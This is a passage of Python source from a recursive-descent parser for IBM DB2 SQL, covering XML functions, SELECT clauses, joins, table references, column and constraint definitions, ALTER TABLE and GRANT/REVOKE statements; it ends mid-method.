elif xmlfunc == 'XMLROW':
while True:
self._parse_expression()
self._match_sequence(['AS', TT.IDENTIFIER])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_row_option(allowroot=False)
elif xmlfunc == 'XMLSERIALIZE':
self._match('CONTENT')
self._parse_expression()
self._expect('AS')
# XXX Data type can only be CHAR/VARCHAR/CLOB
self._parse_datatype()
valid = set(['VERSION', 'INCLUDING', 'EXCLUDING'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'VERSION':
self._expect(TT.STRING)
elif t == 'INCLUDING':
valid.remove('EXCLUDING')
self._expect('XMLDECLARATION')
elif t == 'EXCLUDING':
valid.remove('INCLUDING')
self._expect('XMLDECLARATION')
elif xmlfunc == 'XMLVALIDATE':
self._match('DOCUMENT')
self._parse_expression()
if self._match('ACCORDING'):
self._expect_sequence(['TO', 'XMLSCHEMA'])
self._parse_xml_schema_identification()
if self._match('NAMESPACE'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect('NAMESPACE')
self._match_sequence(['ELEMENT', TT.IDENTIFIER])
elif xmlfunc == 'XMLTABLE':
self._parse_expression()
if self._match(','):
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
if self._match('COLUMNS'):
while True:
self._expect(TT.IDENTIFIER)
if not self._match_sequence(['FOR', 'ORDINALITY']):
self._parse_datatype()
self._match_sequence(['BY', 'REF'])
if self._match('DEFAULT'):
self._parse_expression()
if self._match('PATH'):
self._expect(TT.STRING)
if not self._match(','):
break
elif xmlfunc == 'XMLTRANSFORM':
self._parse_expression()
self._expect('USING')
self._parse_expression()
if self._match('WITH'):
self._parse_expression()
if self._match('AS'):
self._parse_datatype()
self._expect(')')
def _parse_xml_schema_identification(self):
"""Parses an identifier for an XML schema"""
# ACCORDING TO XMLSCHEMA already matched
if self._match('ID'):
self._parse_subschema_name()
else:
if self._match('URI'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect('NAMESPACE')
else:
self._expected_one_of(['ID', 'URI', 'NO'])
self._match_sequence(['LOCATION', TT.STRING])
def _parse_xml_row_option(self, allowroot=False):
"""Parses an XML OPTION suffix for rows in certain XML function calls"""
# OPTION already matched
valid = set(['ROW', 'AS'])
if allowroot:
valid.add('ROOT')
while valid:
t = self._expect_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t in ('ROW', 'ROOT'):
self._expect(TT.IDENTIFIER)
elif t == 'AS':
self._expect('ATTRIBUTES')
def _parse_xml_value_option(self):
"""Parses an XML OPTION suffix for scalar values in certain XML function calls"""
# OPTION already matched
valid = set(['EMPTY', 'NULL', 'XMLBINARY'])
while valid:
t = self._expect_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'EMPTY':
valid.remove('NULL')
self._expect_sequence(['ON', 'NULL'])
elif t == 'NULL':
valid.remove('EMPTY')
self._expect_sequence(['ON', 'NULL'])
elif t == 'XMLBINARY':
self._match('USING')
self._expect_one_of(['BASE64', 'HEX'])
def _parse_sql_function_call(self):
"""Parses scalar function calls with abnormal internal syntax (usually as dictated by the SQL standard)"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Note that only the "special" syntax of functions is handled here.
# Most of these functions will also accept "normal" syntax. In that
# case, this method will raise a parse error and the caller will
# backtrack to handle the function as normal with
# _parse_scalar_function_call
sqlfunc = self._expect_one_of([
'CHAR_LENGTH',
'CHARACTER_LENGTH',
'OVERLAY',
'POSITION',
'SUBSTRING',
'TRIM',
]).value
self._expect('(', prespace=False)
if sqlfunc in ('CHAR_LENGTH', 'CHARACTER_LENGTH'):
self._parse_expression()
if self._match('USING'):
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'OVERLAY':
self._parse_expression()
self._expect('PLACING')
self._parse_expression()
self._expect('FROM')
self._parse_expression()
if self._match('FOR'):
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'POSITION':
self._parse_expression()
self._expect('IN')
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'SUBSTRING':
self._parse_expression()
self._expect('FROM')
self._parse_expression()
if self._match('FOR'):
self._parse_expression()
self._expect('USING')
self._expect_one_of(['CODEUNITS16', 'CODEUNITS32', 'OCTETS'])
elif sqlfunc == 'TRIM':
if self._match_one_of(['BOTH', 'B', 'LEADING', 'L', 'TRAILING', 'T']):
self._match(TT.STRING)
self._expect('FROM')
self._parse_expression()
self._expect(')')
def _parse_scalar_function_call(self):
"""Parses a scalar function call with all its arguments"""
self._parse_function_name()
self._expect('(', prespace=False)
if not self._match(')'):
self._parse_expression_list()
self._expect(')')
def _parse_olap_range(self, optional):
"""Parses a ROWS or RANGE specification in an OLAP-function call"""
# [ROWS|RANGE] already matched
if self._match('CURRENT'):
self._expect('ROW')
elif self._match_one_of(['UNBOUNDED', TT.NUMBER]):
self._expect_one_of(['PRECEDING', 'FOLLOWING'])
elif not optional:
self._expected_one_of(['CURRENT', 'UNBOUNDED', TT.NUMBER])
else:
return False
return True
def _parse_olap_window_clause(self):
"""Parses the aggregation suffix in an OLAP-function call"""
# OVER already matched
self._expect('(')
if not self._match(')'):
self._indent()
if self._match('PARTITION'):
self._expect('BY')
self._parse_expression_list()
if self._match('ORDER'):
self._newline(-1)
self._expect('BY')
while True:
if self._match('ORDER'):
self._expect('OF')
self._parse_table_name()
else:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if self._match('NULLS'):
self._expect_one_of(['FIRST', 'LAST'])
if not self._match(','):
break
if self._match_one_of(['ROWS', 'RANGE']):
if not self._parse_olap_range(True):
self._expect('BETWEEN')
self._parse_olap_range(False)
self._expect('AND')
self._parse_olap_range(False)
self._outdent()
self._expect(')')
def _parse_cast_expression(self):
"""Parses a CAST() expression"""
# CAST already matched
self._expect('(', prespace=False)
self._parse_expression()
self._expect('AS')
self._parse_datatype()
if self._match('SCOPE'):
self._parse_relation_name()
self._expect(')')
def _parse_searched_case(self):
"""Parses a searched CASE expression (CASE WHEN expression...)"""
# CASE WHEN already matched
# Parse all WHEN cases
self._indent(-1)
while True:
self._parse_search_condition(newlines=False) # WHEN Search condition
self._expect('THEN')
self._parse_expression() # THEN Expression
if self._match('WHEN'):
self._newline(-1)
elif self._match('ELSE'):
self._newline(-1)
break
elif self._match('END'):
self._outdent(-1)
return
else:
self._expected_one_of(['WHEN', 'ELSE', 'END'])
# Parse the optional ELSE case
self._parse_expression() # ELSE Expression
self._outdent()
self._expect('END')
def _parse_simple_case(self):
"""Parses a simple CASE expression (CASE expression WHEN value...)"""
# CASE already matched
# Parse the CASE Expression
self._parse_expression() # CASE Expression
# Parse all WHEN cases
self._indent()
self._expect('WHEN')
while True:
self._parse_expression() # WHEN Expression
self._expect('THEN')
self._parse_expression() # THEN Expression
if self._match('WHEN'):
self._newline(-1)
elif self._match('ELSE'):
self._newline(-1)
break
elif self._match('END'):
self._outdent(-1)
return
else:
self._expected_one_of(['WHEN', 'ELSE', 'END'])
# Parse the optional ELSE case
self._parse_expression() # ELSE Expression
self._outdent()
self._expect('END')
def _parse_column_expression(self):
"""Parses an expression representing a column in a SELECT expression"""
if not self._match_sequence([TT.IDENTIFIER, '.', '*']):
self._parse_expression()
# Parse optional column alias
if self._match('AS'):
self._expect(TT.IDENTIFIER)
# Ambiguity: FROM and INTO can legitimately appear in this
# position as a KEYWORD (which the IDENTIFIER match below would
# accept)
elif not self._peek_one_of(['FROM', 'INTO']):
self._match(TT.IDENTIFIER)
def _parse_grouping_expression(self):
"""Parses a grouping-expression in a GROUP BY clause"""
if not self._match_sequence(['(', ')']):
self._parse_expression()
def _parse_super_group(self):
"""Parses a super-group in a GROUP BY clause"""
# [ROLLUP|CUBE] already matched
self._expect('(')
self._indent()
while True:
if self._match('('):
self._parse_expression_list()
self._expect(')')
else:
self._parse_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
def _parse_grouping_sets(self):
"""Parses a GROUPING SETS expression in a GROUP BY clause"""
# GROUPING SETS already matched
self._expect('(')
self._indent()
while True:
if self._match('('):
while True:
if self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
else:
self._parse_grouping_expression()
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
else:
self._parse_grouping_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
def _parse_group_by(self):
"""Parses the grouping-expression-list of a GROUP BY clause"""
# GROUP BY already matched
alt_syntax = True
while True:
if self._match('GROUPING'):
self._expect('SETS')
self._parse_grouping_sets()
alt_syntax = False
elif self._match_one_of(['ROLLUP', 'CUBE']):
self._parse_super_group()
alt_syntax = False
else:
self._parse_grouping_expression()
if not self._match(','):
break
else:
self._newline()
# Ambiguity: the WITH used in the alternate syntax for super-groups
# can be mistaken for the WITH defining isolation level at the end
# of a query. Hence we must use a sequence match here...
if alt_syntax:
if not self._match_sequence(['WITH', 'ROLLUP']):
self._match_sequence(['WITH', 'CUBE'])
def _parse_sub_select(self, allowinto=False):
"""Parses a sub-select expression"""
# SELECT already matched
self._match_one_of(['ALL', 'DISTINCT'])
if not self._match('*'):
self._indent()
while True:
self._parse_column_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
if allowinto and self._match('INTO'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect('FROM')
self._indent()
while True:
self._parse_join_expression()
if not self._match(','):
break
else:
self._newline()
self._outdent()
if self._match('WHERE'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match_sequence(['GROUP', 'BY']):
self._indent()
self._parse_group_by()
self._outdent()
if self._match('HAVING'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match_sequence(['ORDER', 'BY']):
self._indent()
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
self._newline()
self._outdent()
if self._match_sequence(['FETCH', 'FIRST']):
self._match(TT.NUMBER) # Row count is optional (defaults to 1)
self._expect_one_of(['ROW', 'ROWS'])
self._expect('ONLY')
def _parse_table_correlation(self, optional=True):
"""Parses a table correlation clause (with optional column alias list)"""
if optional:
# An optional table correlation is almost always ambiguous given
# that it can start with just about any identifier (the AS is
# always optional)
self._save_state()
try:
# Call ourselves recursively to try and parse the correlation
self._parse_table_correlation(False)
except ParseError:
# If it fails, rewind and return
self._restore_state()
else:
self._forget_state()
else:
if self._match('AS'):
self._expect(TT.IDENTIFIER)
# Ambiguity: Several KEYWORDs can legitimately appear in this
# position. XXX This is horrible - there /must/ be a cleaner way of
# doing this with states and backtracking
elif not self._peek_one_of([
'DO',
'EXCEPT',
'MINUS',
'FETCH',
'GROUP',
'HAVING',
'CROSS',
'LEFT',
'RIGHT',
'FULL',
'INNER',
'JOIN',
'NATURAL',
'INTERSECT',
'ON',
'ORDER',
'SET',
'TABLESAMPLE',
'UNION',
'USING',
'WHERE',
'WITH',
]):
self._expect(TT.IDENTIFIER)
# Parse optional column aliases
if self._match('('):
self._parse_ident_list()
self._expect(')')
def _parse_values_expression(self, allowdefault=False, allowinto=False):
"""Parses a VALUES expression"""
# VALUES already matched
self._indent()
while True:
if self._match('('):
self._parse_expression_list(allowdefault)
self._expect(')')
else:
if not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if self._match(','):
self._newline()
else:
break
self._outdent()
if allowinto and self._match('INTO'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
def _parse_join_expression(self):
"""Parses join operators in a table-reference"""
self._parse_table_ref()
while True:
if self._match('CROSS'):
self._newline(-1)
self._expect('JOIN')
self._parse_table_ref()
elif self._match('INNER'):
self._newline(-1)
self._expect('JOIN')
self._parse_table_ref()
self._parse_join_condition()
elif self._match_one_of(['LEFT', 'RIGHT', 'FULL']):
self._newline(-1)
self._match('OUTER')
self._expect('JOIN')
self._parse_table_ref()
self._parse_join_condition()
elif self._match('JOIN'):
self._newline(-1)
self._parse_table_ref()
self._parse_join_condition()
else:
break
def _parse_lateral_options(self):
"""Parses the RETURN DATA UNTIL options of a LATERAL/TABLE reference"""
if self._match_sequence(['RETURN', 'DATA', 'UNTIL']):
while True:
self._expect_sequence(['FEDERATED', 'SQLSTATE'])
self._match('VALUE')
self._expect(TT.STRING)
if self._match('SQLCODE'):
while True:
self._expect(TT.NUMBER)
if not self._match(','):
break
if not self._match(','):
break
return True
else:
return False
def _parse_table_ref(self):
"""Parses literal table references or functions in a table-reference"""
# Ambiguity: A table or schema can be named TABLE, FINAL, OLD, etc.
reraise = False
self._save_state()
try:
if self._match('('):
# Ambiguity: Open-parenthesis could indicate a full-select or a
# join expression
self._save_state()
try:
# Try and parse a full-select
self._parse_full_select()
reraise = True
self._expect(')')
self._parse_table_correlation(optional=True)
except ParseError:
# If it fails, rewind and try a join expression instead
self._restore_state()
if reraise: raise
self._parse_join_expression()
self._expect(')')
else:
self._forget_state()
elif self._match('LATERAL'):
self._parse_lateral_options()
self._expect('(', prespace=False)
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('TABLE'):
lateral = self._parse_lateral_options()
self._expect('(', prespace=False)
# Ambiguity: TABLE() can indicate a table-function call or a
# nested table expression
self._save_state()
try:
# Try and parse a full-select
self._indent()
self._parse_full_select()
self._outdent()
except ParseError:
# If it fails, rewind and try a function call instead
self._restore_state()
if lateral: raise
self._parse_function_call()
else:
self._forget_state()
reraise = True
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match_one_of(['FINAL', 'NEW']):
self._expect('TABLE')
self._expect('(', prespace=False)
self._indent()
if self._expect_one_of(['INSERT', 'UPDATE']).value == 'INSERT':
self._parse_insert_statement()
else:
self._parse_update_statement()
reraise = True
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('OLD'):
self._expect('TABLE')
self._expect('(', prespace=False)
self._indent()
if self._expect_one_of(['UPDATE', 'DELETE']).value == 'DELETE':
self._parse_delete_statement()
else:
self._parse_update_statement()
reraise = True
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=True)
elif self._match('UNNEST'):
self._expect('(', prespace=False)
self._indent()
while True:
if self._match('CAST'):
self._parse_cast_expression()
else:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._outdent()
self._expect(')')
self._parse_table_correlation(optional=False)
elif self._peek('XMLTABLE'):
# Bizarrely, the XMLTABLE table function can be used outside a
# TABLE() reference...
self._parse_xml_function_call()
else:
raise ParseBacktrack()
except ParseError:
# If the above fails, rewind and try a simple table reference
self._restore_state()
if reraise: raise
self._parse_table_name()
self._parse_table_correlation(optional=True)
if self._match('TABLESAMPLE'):
self._expect_one_of(['BERNOULLI', 'SYSTEM'])
self._expect('(')
self._parse_expression()
self._expect(')')
if self._match('REPEATABLE'):
self._expect('(')
self._parse_expression()
self._expect(')')
else:
self._forget_state()
def _parse_join_condition(self):
"""Parses the condition on an SQL-92 style join"""
# This method can be extended to support USING(ident-list) if this
# if ever added to DB2 (see PostgreSQL)
self._indent()
self._expect('ON')
self._parse_search_condition()
self._outdent()
def _parse_full_select(self, allowdefault=False, allowinto=False):
"""Parses set operators (low precedence) in a full-select expression"""
self._parse_relation(allowdefault, allowinto)
while True:
if self._match_one_of(['UNION', 'INTERSECT', 'EXCEPT', 'MINUS']):
self._newline(-1)
self._newline(-1, allowempty=True)
self._match('ALL')
self._newline()
self._newline(allowempty=True)
# No need to include allowinto here (it's only permitted in a
# top-level subselect)
self._parse_relation(allowdefault)
else:
break
if self._match('ORDER'):
self._expect('BY')
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
if self._match('FETCH'):
self._expect('FIRST')
self._match(TT.NUMBER) # Row count is optional (defaults to 1)
self._expect_one_of(['ROW', 'ROWS'])
self._expect('ONLY')
def _parse_relation(self, allowdefault=False, allowinto=False):
"""Parses relation generators (high precedence) in a full-select expression"""
# XXX Add support for the TABLE statement from the SQL standard
if self._match('('):
self._indent()
# No need to include allowinto here (it's only permitted in a
# top-level subselect)
self._parse_full_select(allowdefault)
self._outdent()
self._expect(')')
elif self._match('SELECT'):
self._parse_sub_select(allowinto)
elif self._match('VALUES'):
self._parse_values_expression(allowdefault, allowinto)
else:
self._expected_one_of(['SELECT', 'VALUES', '('])
def _parse_query(self, allowdefault=False, allowinto=False):
"""Parses a full-select with optional common-table-expression"""
# Parse the optional common-table-expression
if self._match('WITH'):
while True:
self._expect(TT.IDENTIFIER)
# Parse the optional column-alias list
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
self._expect('AS')
self._expect('(')
self._indent()
# No need to include allowdefault or allowinto here. Neither
# are ever permitted in a CTE
self._parse_full_select()
self._outdent()
self._expect(')')
if not self._match(','):
break
else:
self._newline()
self._newline()
# Parse the actual full-select. DEFAULT may be permitted here if the
# full-select turns out to be a VALUES statement
self._parse_full_select(allowdefault, allowinto)
# CLAUSES ################################################################
def _parse_assignment_clause(self, allowdefault):
"""Parses a SET clause"""
# SET already matched
while True:
if self._match('('):
# Parse tuple assignment
while True:
self._parse_subrelation_name()
if not self._match(','):
break
self._expect_sequence([')', '=', '('])
self._parse_tuple(allowdefault=True)
self._expect(')')
else:
# Parse simple assignment
self._parse_subrelation_name()
if self._match('['):
self._parse_expression()
self._expect(']')
if self._match('.'):
self._expect(TT.IDENTIFIER)
self._expect('=')
if self._match('ARRAY'):
self._expect('[', prespace=False)
# Ambiguity: Expression list vs. select-statement
self._save_state()
try:
self._parse_expression_list()
except ParseError:
self._restore_state()
self._parse_full_select()
else:
self._forget_state()
self._expect(']')
elif not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if not self._match(','):
break
else:
self._newline()
def _parse_identity_options(self, alter=None):
"""Parses options for an IDENTITY column"""
# AS IDENTITY already matched
# Build a couple of lists of options which have not yet been seen
validno = [
'MINVALUE',
'MAXVALUE',
'CACHE',
'CYCLE',
'ORDER',
]
valid = validno + ['INCREMENT', 'NO']
if alter is None:
valid = valid + ['START']
elif alter == 'SEQUENCE':
valid = valid + ['RESTART']
# XXX Allow backward compatibility options here? Backward
# compatibility options include comma separation of arguments, and
# NOMINVALUE instead of NO MINVALUE, etc.
while valid:
if alter == 'COLUMN':
if self._match('RESTART'):
if self._match('WITH'):
self._expect(TT.NUMBER)
continue
elif self._match('SET'):
t = self._expect_one_of(valid).value
if t != 'NO': valid.remove(t)
if t in validno: validno.remove(t)
else:
break
else:
t = self._match_one_of(valid)
if t:
t = t.value
if t != 'NO': valid.remove(t)
if t in validno: validno.remove(t)
else:
break
if t == 'START':
self._expect_sequence(['WITH', TT.NUMBER])
elif t == 'RESTART':
if self._match('WITH'):
self._expect(TT.NUMBER)
elif t == 'INCREMENT':
self._expect_sequence(['BY', TT.NUMBER])
elif t in ('MINVALUE', 'MAXVALUE', 'CACHE'):
self._expect(TT.NUMBER)
elif t in ('CYCLE', 'ORDER'):
pass
elif t == 'NO':
t = self._expect_one_of(validno).value
validno.remove(t)
valid.remove(t)
def _parse_column_definition(self, aligntypes=False, alignoptions=False, federated=False):
"""Parses a column definition in a CREATE TABLE statement"""
# Parse a column definition
self._expect(TT.IDENTIFIER)
if aligntypes:
self._valign()
self._parse_datatype()
if alignoptions and not self._peek_one_of([',', ')']):
self._valign()
# Parse column options
while True:
if self._match('NOT'):
self._expect_one_of(['NULL', 'LOGGED', 'COMPACT', 'HIDDEN'])
elif self._match('LOGGED'):
pass
elif self._match('COMPACT'):
pass
elif self._match('WITH'):
self._expect('DEFAULT')
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
else:
self._forget_state()
elif self._match('DEFAULT'):
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
else:
self._forget_state()
elif self._match('GENERATED'):
if self._expect_one_of(['ALWAYS', 'BY']).value == 'BY':
self._expect('DEFAULT')
if self._match('AS'):
if self._match('IDENTITY'):
if self._match('('):
self._parse_identity_options()
self._expect(')')
elif self._match('('):
self._parse_expression()
self._expect(')')
else:
self._expected_one_of(['IDENTITY', '('])
else:
self._expect_sequence(['FOR', 'EACH', 'ROW', 'ON', 'UPDATE', 'AS', 'ROW', 'CHANGE', 'TIMESTAMP'])
elif self._match('INLINE'):
self._expect_sequence(['LENGTH', TT.NUMBER])
elif self._match('COMPRESS'):
self._expect_sequence(['SYSTEM', 'DEFAULT'])
elif self._match('COLUMN'):
self._expect_sequence(['SECURED', 'WITH', TT.IDENTIFIER])
elif self._match('SECURED'):
self._expect_sequence(['WITH', TT.IDENTIFIER])
elif self._match('IMPLICITLY'):
self._expect('HIDDEN')
elif federated and self._match('OPTIONS'):
self._parse_federated_options()
else:
self._save_state()
try:
self._parse_column_constraint()
except ParseError:
self._restore_state()
break
else:
self._forget_state()
def _parse_column_constraint(self):
"""Parses a constraint attached to a specific column in a CREATE TABLE statement"""
# Parse the optional constraint name
if self._match('CONSTRAINT'):
self._expect(TT.IDENTIFIER)
# Parse the constraint definition
if self._match('PRIMARY'):
self._expect('KEY')
elif self._match('UNIQUE'):
pass
elif self._match('REFERENCES'):
self._parse_table_name()
if self._match('(', prespace=False):
self._expect(TT.IDENTIFIER)
self._expect(')')
t = ['DELETE', 'UPDATE']
for i in xrange(2):
if self._match('ON'):
t.remove(self._expect_one_of(t).value)
if self._match('NO'):
self._expect('ACTION')
elif self._match('SET'):
self._expect('NULL')
elif self._match_one_of(['RESTRICT', 'CASCADE']):
pass
else:
self._expected_one_of([
'RESTRICT',
'CASCADE',
'NO',
'SET'
])
else:
break
elif self._match('CHECK'):
self._expect('(')
# Ambiguity: check constraint can be a search condition or a
# functional dependency. Try the search condition first
self._save_state()
try:
self._parse_search_condition()
except ParseError:
self._restore_state()
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
self._expect_sequence(['DETERMINED', 'BY'])
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect(')')
else:
self._expected_one_of([
'CONSTRAINT',
'PRIMARY',
'UNIQUE',
'REFERENCES',
'CHECK'
])
def _parse_table_constraint(self):
"""Parses a constraint attached to a table in a CREATE TABLE statement"""
if self._match('CONSTRAINT'):
self._expect(TT.IDENTIFIER)
if self._match('PRIMARY'):
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('UNIQUE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('FOREIGN'):
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._expect('REFERENCES')
self._parse_subschema_name()
self._expect('(', prespace=False)
self._parse_ident_list()
self._expect(')')
t = ['DELETE', 'UPDATE']
for i in xrange(2):
if self._match('ON'):
t.remove(self._expect_one_of(t).value)
if self._match('NO'):
self._expect('ACTION')
elif self._match('SET'):
self._expect('NULL')
elif self._match_one_of(['RESTRICT', 'CASCADE']):
pass
else:
self._expected_one_of([
'RESTRICT',
'CASCADE',
'NO',
'SET'
])
else:
break
elif self._match('CHECK'):
self._expect('(')
# Ambiguity: check constraint can be a search condition or a
# functional dependency. Try the search condition first
self._save_state()
try:
self._parse_search_condition(newlines=False)
except ParseError:
self._restore_state()
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
self._expect_sequence(['DETERMINED', 'BY'])
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect(')')
else:
self._expected_one_of([
'CONSTRAINT',
'PRIMARY',
'UNIQUE',
'FOREIGN',
'CHECK'
])
def _parse_table_definition(self, aligntypes=False, alignoptions=False, federated=False):
"""Parses a table definition (list of columns and constraints)"""
self._expect('(')
self._indent()
while True:
self._save_state()
try:
# Try parsing a table constraint definition
self._parse_table_constraint()
except ParseError:
# If that fails, rewind and try and parse a column definition
self._restore_state()
self._parse_column_definition(aligntypes=aligntypes, alignoptions=alignoptions, federated=federated)
else:
self._forget_state()
if not self._match(','):
break
else:
self._newline()
if aligntypes:
self._vapply()
if alignoptions:
self._vapply()
self._outdent()
self._expect(')')
def _parse_constraint_alteration(self):
"""Parses a constraint-alteration in an ALTER TABLE statement"""
# FOREIGN KEY/CHECK already matched
self._expect(TT.IDENTIFIER)
if self._match_one_of(['ENABLE', 'DISABLE']):
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
else:
self._match('NOT')
self._expect('ENFORCED')
def _parse_column_alteration(self):
"""Parses a column-alteration in an ALTER TABLE statement"""
self._expect(TT.IDENTIFIER)
if self._match('DROP'):
if self._match('NOT'):
self._expect('NULL')
elif self._match('COLUMN'):
self._expect('SECURITY')
else:
self._expect_one_of([
'NOT',
'COLUMN',
'IDENTITY',
'DEFAULT',
'EXPRESSION'
])
elif self._match('COMPRESS'):
if self._match('SYSTEM'):
self._expect('DEFAULT')
else:
self._expect('OFF')
elif self._match('SECURED'):
self._expect_sequence(['WITH', TT.IDENTIFIER])
else:
# Ambiguity: SET can introduce several different alterations
self._save_state()
try:
# Try and parse SET (DATA TYPE | EXPRESSION | INLINE LENGTH | GENERATED)
self._expect('SET')
if self._match('DATA'):
self._expect('TYPE')
self._parse_datatype()
elif self._match('EXPRESSION'):
self._expect('AS')
self._expect('(')
self._parse_expression()
self._expect(')')
elif self._match('INLINE'):
self._expect_sequence(['LENGTH', TT.NUMBER])
elif self._match('GENERATED'):
if self._match(['BY', 'ALWAYS']).value == 'BY':
self._expect('DEFAULT')
self._expect('AS')
if self._match('IDENTITY'):
if self._match('('):
self._parse_identity_options()
self._expect(')')
elif self._match('('):
self._parse_expression()
self._expect(')')
else:
self._expected_one_of(['IDENTITY', '('])
elif self._match('NOT'):
self._expect('NULL')
else:
raise ParseBacktrack()
except ParseBacktrack:
# NOTE: This exception block is only called on a ParseBacktrack
# error. Other parse errors will propogate outward. If the
# above SET clauses didn't match, try an identity-alteration.
self._restore_state()
self._parse_identity_options(alter='COLUMN')
else:
self._forget_state()
def _parse_federated_column_alteration(self):
"""Parses a column-alteration in an ALTER NICKNAME statement"""
self._expect(TT.IDENTIFIER)
while True:
if self._match('LOCAL'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
elif self._match('TYPE'):
self._parse_datatype()
elif self._match('OPTIONS'):
self._parse_federated_options(alter=True)
if not self._match(','):
break
def _parse_auth_list(self):
"""Parses an authorization list in a GRANT or REVOKE statement"""
# [TO|FROM] already matched
while True:
if not self._match('PUBLIC'):
self._match_one_of(['USER', 'GROUP', 'ROLE'])
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
def _parse_grant_revoke(self, grant):
"""Parses the body of a GRANT or REVOKE statement"""
# [GRANT|REVOKE] already matched
# Parse any preamble
seclabel = False
if self._match('ROLE'):
pass
elif self._match_sequence(['SECURITY', 'LABEL']):
seclabel = grant
# Parse the privilege list
while True:
priv = self._expect(TT.IDENTIFIER)
if priv.value in ('REFERENCES', 'UPDATE'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
elif priv.value == 'DBADM':
while self._match_one_of(['WITH', 'WITHOUT']):
self._expect_one_of(['DATAACCESS', 'ACCESSCTRL'])
elif priv.value == 'DB2LBACWRITEARRAY':
self._expect_one_of(['WRITEDOWN', 'WRITEUP'])
elif priv.value == 'ALL':
self._match('PRIVILEGES')
break
if not self._match(','):
break
# Parse the target list
if self._match('OF'):
self._expect_sequence(['TABLESPACE', TT.IDENTIFIER])
elif self._match('ON'):
while True:
if self._match('DATABASE'):
break
elif self._match('RULE'):
if self._expect_one_of([
'DB2LBACREADARRAY',
'DB2LBACREADSET',
'DB2LBACREADTREE',
'DB2LBACWRITEARRAY',
'DB2LBACWRITESET',
'DB2LBACWRITETREE',
'ALL'
]).value == 'DB2LBACWRITEARRAY':
self._expect_one_of(['WRITEDOWN', 'WRITEUP'])
self._expect_sequence(['FOR', TT.IDENTIFIER])
break
elif self._match('VARIABLE'):
self._parse_variable_name()
break
elif self._match('INDEX'):
self._parse_index_name()
break
elif self._match('MODULE'):
self._parse_module_name()
break
elif self._match_one_of(['PROGRAM', 'PACKAGE']):
self._parse_subschema_name()
break
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
# Ambiguity: Can use schema.* or schema.name(prototype) here
if not self._match('*') and not self._match_sequence([TT.IDENTIFIER, '.', '*']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
break
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
break
elif self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
break
elif self._match('SEQUENCE'):
self._parse_sequence_name()
break
elif self._match('SERVER'):
self._expect(TT.IDENTIFIER)
break
elif self._match('USER'):
self._expect(TT.IDENTIFIER)
elif self._match('PUBLIC'):
pass
elif self._match('TABLE'):
self._parse_table_name()
break
elif self._match('WORKLOAD'):
self._expect(TT.IDENTIFIER)
break
elif self._match('XSROBJECT'):
self._parse_subschema_name()
break
else:
self._parse_table_name()
break
if not self._match(','):
break
# Parse the grantee(s)
# XXX The following is a bit lax, but again, adhering strictly to the
# syntax results in a ridiculously complex syntax
self._expect(['FROM', 'TO'][grant])
self._parse_auth_list()
if seclabel:
if self._match('FOR'):
self._expect_one_of(['ALL', 'READ', 'WRITE'])
self._expect('ACCESS')
elif grant:
if self._match('WITH'):
